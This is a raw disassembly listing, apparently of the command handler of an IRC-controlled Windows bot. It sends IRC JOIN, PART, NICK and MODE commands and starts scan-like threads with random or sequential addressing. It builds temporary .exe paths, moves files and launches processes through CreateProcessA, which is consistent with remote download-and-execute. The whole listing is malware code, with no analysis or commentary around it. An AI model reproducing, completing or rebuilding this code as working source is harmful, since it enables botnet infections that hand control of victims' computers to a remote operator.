mov esi, offset aAwk1 ; "##awk1"
push offset byte_4370BC
push esi
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_40AADF
mov [ebp+var_3A0], bl
loc_40AB1D: ; CODE XREF: sub_4087B3+233D�j
cmp [ebp+var_2F0], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_40AB2F
mov eax, offset aSequential ; "Sequential"
loc_40AB2F: ; CODE XREF: sub_4087B3+2375�j
push [ebp+var_304]
lea ecx, [ebp+var_430]
push [ebp+var_314]
push [ebp+var_318]
push [ebp+var_31C]
push ecx
push eax
lea eax, [ebp+var_2E4]
push offset dword_42EB28
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push 8
push eax
call sub_40105F
add esp, 2Ch
mov [ebp+var_310], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_430]
push ebx
push eax
push offset loc_401366
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_310]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40ABBD
loc_40ABA7: ; CODE XREF: sub_4087B3+2408�j
cmp [ebp+var_2EC], ebx
jnz loc_40A72D
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40ABA7
; ---------------------------------------------------------------------------
loc_40ABBD: ; CODE XREF: sub_4087B3+23F2�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset dword_42EADC
jmp loc_40A71E
; ---------------------------------------------------------------------------
loc_40ABCE: ; CODE XREF: sub_4087B3+1D39�j
; sub_4087B3+1D4E�j
push [ebp+arg_10]
call sub_416CCF
imul eax, 234h
pop ecx
cmp byte_43E938[eax], bl
jz loc_40D023
cmp [ebp+var_C], ebx
jz loc_40D023
push [ebp+arg_18]
call sub_4158E0
push [ebp+arg_10]
mov esi, eax
call sub_4158E0
push edi
add esi, eax
call sub_4158E0
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_417760
mov esi, eax
lea eax, [ebp+var_2E4]
push esi
push offset dword_42EACC
push eax
call sub_416821
add esp, 20h
cmp esi, ebx
jz loc_40D023
mov edi, [ebp+arg_10]
push edi
call sub_416CCF
test eax, eax
pop ecx
jle loc_40D023
push edi
call sub_416CCF
cmp eax, 1F4h
pop ecx
jge loc_40D023
push ebx
lea eax, [ebp+var_2E4]
push ebx
push eax
push [ebp+arg_18]
push edi
call sub_416CCF
imul eax, 234h
pop ecx
push dword_43E92C[eax]
call sub_4010D2
push edi
call sub_416CCF
imul eax, 234h
add esp, 18h
cmp byte ptr dword_43E720[eax], 73h
jnz loc_40D023
push esi
push edi
call sub_416CCF
imul eax, 234h
pop ecx
add eax, offset byte_43E938
push eax
push [ebp+arg_18]
push offset aSSS ; "[%s] * %s %s"
loc_40ACBB: ; CODE XREF: sub_4087B3+2607�j
lea eax, [ebp+var_2E4]
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
jmp loc_40C8C7
; ---------------------------------------------------------------------------
loc_40ACE5: ; CODE XREF: sub_4087B3+1D0F�j
; sub_4087B3+1D24�j
push [ebp+arg_10]
call sub_416CCF
imul eax, 234h
pop ecx
cmp byte_43E938[eax], bl
jz loc_40D023
cmp [ebp+var_C], ebx
jz loc_40D023
push [ebp+arg_18]
call sub_4158E0
push [ebp+arg_10]
mov esi, eax
call sub_4158E0
push edi
add esi, eax
call sub_4158E0
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_417760
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_40D023
mov edi, [ebp+arg_10]
push edi
call sub_416CCF
test eax, eax
pop ecx
jle loc_40D023
push edi
call sub_416CCF
cmp eax, 1F4h
pop ecx
jge loc_40D023
push ebx
push ebx
push esi
push [ebp+arg_18]
push edi
call sub_416CCF
imul eax, 234h
pop ecx
push dword_43E92C[eax]
call sub_4010D2
push edi
call sub_416CCF
imul eax, 234h
add esp, 18h
cmp byte ptr dword_43E720[eax], 73h
jnz loc_40D023
push esi
push edi
call sub_416CCF
imul eax, 234h
pop ecx
add eax, offset byte_43E938
push eax
push [ebp+arg_18]
push offset aSSS_0 ; "[%s] <%s> %s"
jmp loc_40ACBB
; ---------------------------------------------------------------------------
loc_40ADBF: ; CODE XREF: sub_4087B3+1CE5�j
; sub_4087B3+1CFA�j
push [ebp+arg_10]
call dword_49169C ; inet_addr
push [ebp+arg_18]
mov [ebp+var_460], eax
call sub_416CCF
push [ebp+arg_0]
mov [ebp+var_46C], eax
call sub_416CCF
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_98]
mov [ebp+var_468], eax
lea eax, [ebp+var_4EC]
mov [ebp+var_4F0], esi
push eax
call sub_416A10
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_458], edi
push [ebp+var_468]
mov [ebp+var_454], eax
push [ebp+var_46C]
push [ebp+var_460]
call dword_4916E8 ; inet_ntoa
push eax
lea eax, [ebp+var_2E4]
push offset dword_42EA5C
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push 8
push eax
call sub_40105F
add esp, 20h
mov [ebp+var_464], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F0]
push ebx
push eax
push offset sub_4010C8
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_464]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40AEA3
loc_40AE8D: ; CODE XREF: sub_4087B3+26EE�j
cmp [ebp+var_450], ebx
jnz loc_40C722
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40AE8D
; ---------------------------------------------------------------------------
loc_40AEA3: ; CODE XREF: sub_4087B3+26D8�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset dword_42EADC
jmp loc_40C713
; ---------------------------------------------------------------------------
loc_40AEB4: ; CODE XREF: sub_4087B3+1CBB�j
; sub_4087B3+1CD0�j
push [ebp+arg_10]
call sub_416CCF
push 7Fh
mov [ebp+var_300], eax
push [ebp+arg_18]
lea eax, [ebp+var_404]
push eax
call sub_416A10
push [ebp+arg_0]
call sub_416CCF
push [ebp+var_98]
mov esi, [ebp+arg_4]
mov [ebp+var_304], eax
lea eax, [ebp+var_384]
push 80h
push eax
mov [ebp+var_40C], esi
call sub_4163D7
mov eax, [ebp+var_8]
add esp, 20h
mov edi, [ebp+var_4]
mov [ebp+var_2F0], eax
push [ebp+var_304]
lea eax, [ebp+var_404]
mov [ebp+var_2F4], edi
push eax
push [ebp+var_300]
push esi
call sub_401299
pop ecx
push eax
lea eax, [ebp+var_2E4]
push offset dword_42EA08
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push 10h
push eax
call sub_40105F
add esp, 24h
mov [ebp+var_2FC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_40C]
push ebx
push eax
push offset sub_4011C7
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_2FC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40AF9F
loc_40AF89: ; CODE XREF: sub_4087B3+27EA�j
cmp [ebp+var_2EC], ebx
jnz loc_40C722
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40AF89
; ---------------------------------------------------------------------------
loc_40AF9F: ; CODE XREF: sub_4087B3+27D4�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset dword_42E9AC
jmp loc_40C713
; ---------------------------------------------------------------------------
loc_40AFB0: ; CODE XREF: sub_4087B3+1C91�j
; sub_4087B3+1CA6�j
mov edi, 0FFh
lea eax, [ebp+var_788]
push edi
push [ebp+arg_10]
push eax
call sub_416A10
push edi
lea eax, [ebp+var_688]
push [ebp+arg_18]
push eax
call sub_416A10
push [ebp+arg_0]
mov [ebp+var_584], ebx
call sub_416CCF
mov [ebp+var_580], eax
mov eax, [ebp+esi+var_90]
add esp, 1Ch
cmp eax, ebx
jz short loc_40B00B
push 10h
push ebx
push eax
call sub_4174DB
add esp, 0Ch
mov [ebp+var_578], eax
jmp short loc_40B011
; ---------------------------------------------------------------------------
loc_40B00B: ; CODE XREF: sub_4087B3+2842�j
mov [ebp+var_578], ebx
loc_40B011: ; CODE XREF: sub_4087B3+2856�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_40B02B
push esi
call sub_416CCF
pop ecx
mov [ebp+var_57C], eax
jmp short loc_40B031
; ---------------------------------------------------------------------------
loc_40B02B: ; CODE XREF: sub_4087B3+2867�j
mov [ebp+var_57C], ebx
loc_40B031: ; CODE XREF: sub_4087B3+2876�j
movzx eax, [ebp+var_9AF]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_98]
mov [ebp+var_574], eax
lea eax, [ebp+var_808]
mov [ebp+var_80C], esi
push eax
call sub_416A10
push [ebp+arg_18]
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
mov [ebp+var_570], eax
push [ebp+arg_10]
lea eax, [ebp+var_2E4]
mov [ebp+var_56C], edi
push offset dword_42E96C
push eax
call sub_416821
push esi
lea eax, [ebp+var_2E4]
push 15h
push eax
call sub_40105F
add esp, 28h
mov [ebp+var_588], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_80C]
push ebx
push eax
push offset sub_40104B
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_588]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40B0E1
loc_40B0CB: ; CODE XREF: sub_4087B3+292C�j
cmp [ebp+var_568], ebx
jnz loc_40C722
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40B0CB
; ---------------------------------------------------------------------------
loc_40B0E1: ; CODE XREF: sub_4087B3+2916�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset dword_42E914
jmp loc_40C713
; ---------------------------------------------------------------------------
loc_40B0F2: ; CODE XREF: sub_4087B3+1C67�j
; sub_4087B3+1C7C�j
push 7Fh
lea eax, [ebp+var_774]
pop esi
push esi
push [ebp+arg_10]
push eax
call sub_416A10
push esi
lea eax, [ebp+var_6F4]
push [ebp+arg_18]
push eax
call sub_416A10
push esi
lea eax, [ebp+var_674]
push [ebp+arg_0]
push eax
call sub_416A10
push esi
lea eax, [ebp+var_5F4]
push [ebp+var_98]
push eax
call sub_416A10
push [ebp+arg_0]
mov eax, [ebp+arg_4]
mov esi, [ebp+var_4]
mov edi, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_778], eax
lea eax, [ebp+var_2E4]
mov [ebp+var_570], esi
push [ebp+arg_10]
mov [ebp+var_56C], edi
push offset dword_42E8D0
push eax
call sub_416821
add esp, 44h
lea eax, [ebp+var_2E4]
push ebx
push 0Bh
push eax
call sub_40105F
add esp, 0Ch
mov [ebp+var_574], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_778]
push ebx
push eax
push offset sub_4012E9
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_574]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40B1C9
loc_40B1B7: ; CODE XREF: sub_4087B3+2A14�j
cmp [ebp+var_568], ebx
jnz short loc_40B1E4
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40B1B7
; ---------------------------------------------------------------------------
loc_40B1C9: ; CODE XREF: sub_4087B3+2A02�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E4]
push offset dword_42E880
push eax
call sub_416821
add esp, 0Ch
loc_40B1E4: ; CODE XREF: sub_4087B3+2A0A�j
cmp edi, ebx
jnz loc_40CEDA
push ebx
push esi
jmp loc_40A73A
; ---------------------------------------------------------------------------
loc_40B1F3: ; CODE XREF: sub_4087B3+1C3D�j
; sub_4087B3+1C52�j
push 7Fh
lea eax, [ebp+var_444]
push [ebp+arg_10]
push eax
call sub_416A10
push [ebp+arg_18]
call sub_416CCF
push 3Fh
mov [ebp+var_2F4], eax
push [ebp+arg_0]
lea eax, [ebp+var_3C4]
push eax
call sub_416A10
mov esi, [ebp+esi+var_90]
add esp, 1Ch
cmp esi, ebx
jz short loc_40B243
push 3Fh
lea eax, [ebp+var_384]
push esi
push eax
call sub_416A10
add esp, 0Ch
loc_40B243: ; CODE XREF: sub_4087B3+2A7C�j
lea eax, [ebp+var_3C4]
mov [ebp+var_2F0], 1
push eax
lea eax, [ebp+var_444]
push [ebp+var_2F4]
push eax
lea eax, [ebp+var_2E4]
push offset unk_42E83C
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push 17h
push eax
call sub_40105F
add esp, 20h
mov [ebp+var_2EC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_448]
push ebx
push eax
push offset sub_4010FF
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_2EC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40B2CF
loc_40B2B9: ; CODE XREF: sub_4087B3+2B1A�j
cmp [ebp+var_2E8], ebx
jnz loc_40A6BC
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40B2B9
; ---------------------------------------------------------------------------
loc_40B2CF: ; CODE XREF: sub_4087B3+2B04�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset unk_42E7EC
jmp loc_40A6AD
; ---------------------------------------------------------------------------
loc_40B2E0: ; CODE XREF: sub_4087B3+1C01�j
; sub_4087B3+1C16�j
push [ebp+arg_18]
push [ebp+arg_10]
call ds:dword_4953BC ; MoveFileA
test eax, eax
jz short loc_40B311
push [ebp+arg_18]
lea eax, [ebp+var_2E4]
push [ebp+arg_10]
push offset dword_42E7B4
push 200h
push eax
call sub_4163D7
add esp, 14h
jmp short loc_40B330
; ---------------------------------------------------------------------------
loc_40B311: ; CODE XREF: sub_4087B3+2B3B�j
push offset dword_42E798
call sub_4010F5
push eax
lea eax, [ebp+var_2E4]
push 200h
push eax
call sub_4163D7
add esp, 10h
loc_40B330: ; CODE XREF: sub_4087B3+164F�j
; sub_4087B3+1677�j ...
cmp [ebp+var_8], ebx
jnz short loc_40B351
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 14h
loc_40B351: ; CODE XREF: sub_4087B3+F6F�j
; sub_4087B3+2B80�j ...
push 1
pop esi
loc_40B354: ; CODE XREF: sub_4087B3+2DFF�j
; sub_4087B3+3618�j ...
lea eax, [ebp+var_2E4]
push eax
call sub_401014
pop ecx
mov eax, esi
jmp loc_408B7A
; ---------------------------------------------------------------------------
loc_40B368: ; CODE XREF: sub_4087B3+1BD7�j
; sub_4087B3+1BEC�j
push 44h
lea eax, [ebp+var_48C]
pop esi
push esi
push ebx
push eax
call sub_415CA0
push 1
mov [ebp+var_48C], esi
pop edi
mov word ptr [ebp+var_45C], bx
push [ebp+arg_10]
mov [ebp+var_460], edi
call sub_416CCF
add esp, 10h
cmp eax, edi
jnz short loc_40B3A7
mov word ptr [ebp+var_45C], 5
loc_40B3A7: ; CODE XREF: sub_4087B3+2BE9�j
cmp [ebp+var_C], ebx
jz loc_40A6BC
push [ebp+arg_18]
push [ebp+var_C]
call sub_417760
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_40A6BC
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_48C]
push eax
push ebx
push ebx
push 28h
push edi
push ebx
push ebx
push esi
push ebx
call ds:dword_495354 ; CreateProcessA
test eax, eax
jnz short loc_40B3F2
push offset dword_42E760
jmp loc_40BE82
; ---------------------------------------------------------------------------
loc_40B3F2: ; CODE XREF: sub_4087B3+2C33�j
push esi
push offset dword_42E734
jmp loc_40A6AD
; ---------------------------------------------------------------------------
loc_40B3FD: ; CODE XREF: sub_4087B3+1BAD�j
; sub_4087B3+1BC2�j
push [ebp+arg_18]
push offset dword_42C954
call sub_416B70
mov edi, [ebp+arg_4]
pop ecx
test eax, eax
pop ecx
jz loc_40B57D
lea eax, [ebp+var_3E8]
push eax
push 104h
call ds:dword_4953B8 ; GetTempPathA
push 0FFh
lea eax, [ebp+var_788]
push [ebp+arg_10]
push eax
call sub_416A10
lea eax, [ebp+var_E4]
push eax
call sub_4011E0
push eax
lea eax, [ebp+var_3E8]
push eax
lea eax, [ebp+var_688]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_416821
mov eax, [ebp+esi+var_94]
add esp, 20h
cmp eax, ebx
mov [ebp+var_584], 1
mov [ebp+var_580], ebx
jz short loc_40B494
push 10h
push ebx
push eax
call sub_4174DB
add esp, 0Ch
mov [ebp+var_578], eax
jmp short loc_40B49A
; ---------------------------------------------------------------------------
loc_40B494: ; CODE XREF: sub_4087B3+2CCB�j
mov [ebp+var_578], ebx
loc_40B49A: ; CODE XREF: sub_4087B3+2CDF�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_40B4B4
push esi
call sub_416CCF
pop ecx
mov [ebp+var_57C], eax
jmp short loc_40B4BA
; ---------------------------------------------------------------------------
loc_40B4B4: ; CODE XREF: sub_4087B3+2CF0�j
mov [ebp+var_57C], ebx
loc_40B4BA: ; CODE XREF: sub_4087B3+2CFF�j
movzx eax, [ebp+var_9AF]
push 7Fh
mov [ebp+var_574], eax
push [ebp+var_98]
lea eax, [ebp+var_808]
mov [ebp+var_80C], edi
push eax
call sub_416A10
mov eax, [ebp+var_4]
push [ebp+arg_10]
mov [ebp+var_56C], eax
mov eax, [ebp+var_8]
mov [ebp+var_570], eax
lea eax, [ebp+var_2E4]
push offset unk_42E6E8
push eax
call sub_416821
push edi
lea eax, [ebp+var_2E4]
push 16h
push eax
call sub_40105F
add esp, 24h
mov [ebp+var_588], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_80C]
push ebx
push eax
push offset sub_40104B
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_588]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40B560
loc_40B54E: ; CODE XREF: sub_4087B3+2DAB�j
cmp [ebp+var_568], ebx
jnz short loc_40B590
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40B54E
; ---------------------------------------------------------------------------
loc_40B560: ; CODE XREF: sub_4087B3+2D99�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E4]
push offset unk_42E690
push eax
call sub_416821
add esp, 0Ch
jmp short loc_40B590
; ---------------------------------------------------------------------------
loc_40B57D: ; CODE XREF: sub_4087B3+2C5E�j
lea eax, [ebp+var_2E4]
push offset unk_42E630
push eax
call sub_416821
pop ecx
pop ecx
loc_40B590: ; CODE XREF: sub_4087B3+2DA1�j
; sub_4087B3+2DC8�j
cmp [ebp+var_8], ebx
jnz short loc_40B5AF
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push edi
loc_40B5A7: ; CODE XREF: sub_4087B3+1965�j
call sub_4010D2
add esp, 14h
loc_40B5AF: ; CODE XREF: sub_4087B3+194B�j
; sub_4087B3+2DE0�j ...
mov esi, [ebp+arg_24]
jmp loc_40B354
; ---------------------------------------------------------------------------
loc_40B5B7: ; CODE XREF: sub_4087B3+1B83�j
; sub_4087B3+1B98�j
push [ebp+var_9C]
push offset a332 ; "332"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_408B77
cmp [ebp+var_C], ebx
jz loc_408B77
push [ebp+arg_18]
push [ebp+var_C]
call sub_417760
push eax
lea eax, [ebp+var_2E4]
push [ebp+var_98]
push [ebp+var_9C]
push [ebp+var_A0]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_416821
lea eax, [ebp+var_2E4]
push 1FFh
push eax
push [ebp+arg_0]
call sub_416A10
push [ebp+arg_10]
call sub_416CCF
add esp, 30h
test eax, eax
jle short loc_40B642
push [ebp+arg_10]
call sub_416CCF
imul eax, 3E8h
pop ecx
push eax
call ds:dword_495324 ; Sleep
loc_40B642: ; CODE XREF: sub_4087B3+2E77�j
push offset dword_42E5FC
call sub_401014
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_408B7A
; ---------------------------------------------------------------------------
loc_40B656: ; CODE XREF: sub_4087B3+1B59�j
; sub_4087B3+1B6E�j
push [ebp+var_9C]
push offset a332 ; "332"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_408B77
cmp [ebp+var_C], ebx
jz loc_40D023
mov edi, [ebp+arg_18]
push edi
push [ebp+var_C]
call sub_417760
inc edi
push offset aRepeat ; "repeat"
push edi
mov esi, eax
call sub_416B70
add esp, 10h
test eax, eax
push esi
jz short loc_40B714
push [ebp+var_98]
lea eax, [ebp+var_2E4]
push [ebp+var_9C]
push [ebp+var_A0]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_416821
lea eax, [ebp+var_2E4]
push 1FFh
push eax
push [ebp+arg_0]
call sub_416A10
push esi
lea eax, [ebp+var_2E4]
push offset dword_42E5D4
push eax
call sub_416821
lea eax, [ebp+var_2E4]
push eax
call sub_401014
push [ebp+arg_10]
call sub_416CCF
add esp, 38h
test eax, eax
jle loc_40D023
push [ebp+arg_10]
call sub_416CCF
add eax, [ebp+arg_24]
pop ecx
jmp loc_408B7A
; ---------------------------------------------------------------------------
loc_40B714: ; CODE XREF: sub_4087B3+2EE6�j
push offset unk_42E58C
jmp loc_40A6AD
; ---------------------------------------------------------------------------
loc_40B71E: ; CODE XREF: sub_4087B3+1B2F�j
; sub_4087B3+1B44�j
push [ebp+arg_18]
lea eax, [ebp+var_2E4]
push offset aPartS ; "PART %s"
push eax
call sub_416821
push [ebp+arg_10]
call sub_416CCF
add esp, 10h
loc_40B73D: ; CODE XREF: sub_4087B3+2FF7�j
test eax, eax
jle loc_40D023
push [ebp+arg_10]
call sub_416CCF
cmp eax, 1F4h
pop ecx
jge loc_40D023
loc_40B759: ; CODE XREF: sub_4087B3+3799�j
lea eax, [ebp+var_2E4]
push eax
push offset aS ; "%s\r\n"
push [ebp+arg_10]
call sub_416CCF
imul eax, 234h
pop ecx
push dword_43E92C[eax]
call sub_401032
jmp loc_40CDB6
; ---------------------------------------------------------------------------
loc_40B784: ; CODE XREF: sub_4087B3+1B05�j
; sub_4087B3+1B1A�j
push [ebp+esi+var_94]
lea eax, [ebp+var_2E4]
push [ebp+arg_18]
push offset aJoinSS_0 ; "JOIN %s %s"
push eax
call sub_416821
push [ebp+arg_10]
call sub_416CCF
add esp, 14h
jmp short loc_40B73D
; ---------------------------------------------------------------------------
loc_40B7AC: ; CODE XREF: sub_4087B3+1ADB�j
; sub_4087B3+1AF0�j
push [ebp+arg_18]
lea eax, [ebp+var_2E4]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_416821
mov esi, [ebp+arg_10]
push esi
call sub_416CCF
add esp, 10h
test eax, eax
jle loc_40D023
push esi
call sub_416CCF
cmp eax, 1F4h
pop ecx
jge loc_40D023
lea eax, [ebp+var_2E4]
push eax
push offset aS ; "%s\r\n"
push esi
call sub_416CCF
imul eax, 234h
pop ecx
push dword_43E92C[eax]
call sub_401032
push [ebp+arg_18]
push esi
push offset dword_42E534
loc_40B813: ; CODE XREF: sub_4087B3+30EA�j
; sub_4087B3+3158�j ...
call sub_4012B2
jmp loc_40CA7A
; ---------------------------------------------------------------------------
loc_40B81D: ; CODE XREF: sub_4087B3+1AB1�j
; sub_4087B3+1AC6�j
cmp [ebp+var_C], ebx
jz loc_40D023
push [ebp+arg_18]
push [ebp+var_C]
call sub_417760
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_40B84E
push esi
lea eax, [ebp+var_2E4]
push offset aModeS ; "MODE %s"
push eax
call sub_416821
add esp, 0Ch
loc_40B84E: ; CODE XREF: sub_4087B3+3084�j
mov edi, [ebp+arg_10]
push edi
call sub_416CCF
test eax, eax
pop ecx
jle loc_40D023
push edi
call sub_416CCF
cmp eax, 1F4h
pop ecx
jge loc_40D023
lea eax, [ebp+var_2E4]
push eax
push offset aS ; "%s\r\n"
push edi
call sub_416CCF
imul eax, 234h
pop ecx
push dword_43E92C[eax]
call sub_401032
push esi
push edi
push offset dword_42E4F8
jmp loc_40B813
; ---------------------------------------------------------------------------
loc_40B8A2: ; CODE XREF: sub_4087B3+1A87�j
; sub_4087B3+1A9C�j
cmp [ebp+var_C], ebx
jz loc_40D023
push [ebp+arg_18]
push [ebp+var_C]
call sub_417760
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_40D023
mov edi, [ebp+arg_10]
push edi
call sub_416CCF
test eax, eax
pop ecx
jle loc_40D023
push edi
call sub_416CCF
cmp eax, 1F4h
pop ecx
jge loc_40D023
push esi
push offset aS ; "%s\r\n"
push edi
call sub_416CCF
imul eax, 234h
pop ecx
push dword_43E92C[eax]
call sub_401032
push esi
push edi
push offset dword_42E4CC
jmp loc_40B813
; ---------------------------------------------------------------------------
loc_40B910: ; CODE XREF: sub_4087B3+1A5D�j
; sub_4087B3+1A72�j
cmp [ebp+var_C], ebx
jz loc_40D023
push [ebp+arg_10]
push [ebp+var_C]
call sub_417760
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_40D023
push esi
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_401032
push esi
push offset unk_42E494
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40B949: ; CODE XREF: sub_4087B3+1A33�j
; sub_4087B3+1A48�j
push [ebp+var_9C]
push offset a332 ; "332"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz loc_408B77
push [ebp+arg_18]
push offset aPartS_0 ; "PART %s\r\n"
push [ebp+arg_4]
call sub_401032
push [ebp+arg_10]
call sub_416CCF
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_495324 ; Sleep
push [ebp+esi+var_94]
push [ebp+arg_18]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_401032
push offset dword_42E464
call sub_401014
jmp loc_40C153
; ---------------------------------------------------------------------------
loc_40B9B1: ; CODE XREF: sub_4087B3+1A09�j
; sub_4087B3+1A1E�j
cmp [ebp+var_C], ebx
jz loc_40D023
push [ebp+arg_10]
call sub_4158E0
push edi
mov esi, eax
call sub_4158E0
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_417760
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_40D023
push esi
lea eax, [ebp+var_2E4]
push offset dword_42EACC
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push ebx
push eax
push [ebp+arg_10]
push [ebp+arg_4]
call sub_4010D2
push esi
push [ebp+arg_10]
push offset unk_42E438
call sub_4012B2
add esp, 2Ch
jmp loc_40D023
; ---------------------------------------------------------------------------
loc_40BA23: ; CODE XREF: sub_4087B3+19DF�j
; sub_4087B3+19F4�j
cmp [ebp+var_C], ebx
jz loc_40D023
push [ebp+arg_10]
call sub_4158E0
push edi
mov esi, eax
call sub_4158E0
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_417760
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_40D023
push ebx
push ebx
push esi
push [ebp+arg_10]
push [ebp+arg_4]
call sub_4010D2
push esi
push [ebp+arg_10]
push offset unk_42E408
call sub_4012B2
loc_40BA75: ; CODE XREF: sub_4087B3+210F�j
add esp, 20h
jmp loc_40D023
; ---------------------------------------------------------------------------
loc_40BA7D: ; CODE XREF: sub_4087B3+19B5�j
; sub_4087B3+19CA�j
cmp [ebp+var_C], ebx
jz loc_408B77
push [ebp+arg_18]
push [ebp+var_C]
call sub_417760
pop ecx
cmp eax, ebx
pop ecx
jz loc_408B77
push eax
push [ebp+arg_10]
call sub_401037
push [ebp+arg_10]
lea eax, [ebp+var_2E4]
push offset unk_42E3D8
push eax
call sub_416821
add esp, 14h
jmp loc_40A72D
; ---------------------------------------------------------------------------
loc_40BAC0: ; CODE XREF: sub_4087B3+1979�j
; sub_4087B3+198E�j
push [ebp+arg_10]
push [ebp+arg_1C]
call sub_417760
pop ecx
test eax, eax
pop ecx
jz loc_40D023
mov esi, [ebp+esi+var_98]
cmp esi, ebx
jz loc_40BB65
push esi
push [ebp+var_C]
call sub_417760
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_40BB4D
push esi
lea eax, [ebp+var_2E4]
push [ebp+var_98]
push [ebp+var_9C]
push [ebp+var_A0]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_416821
lea eax, [ebp+var_2E4]
push 1FFh
push eax
push [ebp+arg_0]
call sub_416A10
push esi
lea eax, [ebp+var_2E4]
push [ebp+arg_10]
push offset unk_42E3A0
push eax
call sub_416821
add esp, 34h
inc [ebp+arg_24]
jmp loc_40CC93
; ---------------------------------------------------------------------------
loc_40BB4D: ; CODE XREF: sub_4087B3+3340�j
lea eax, [ebp+var_2E4]
push offset unk_42E35C
push eax
call sub_416821
pop ecx
pop ecx
jmp loc_40CC93
; ---------------------------------------------------------------------------
loc_40BB65: ; CODE XREF: sub_4087B3+332B�j
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_401302
add esp, 0Ch
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
push [ebp+arg_10]
lea eax, [ebp+var_2E4]
push offset dword_42E334
push 200h
push eax
call sub_4163D7
add esp, 24h
jmp loc_40CC93
; ---------------------------------------------------------------------------
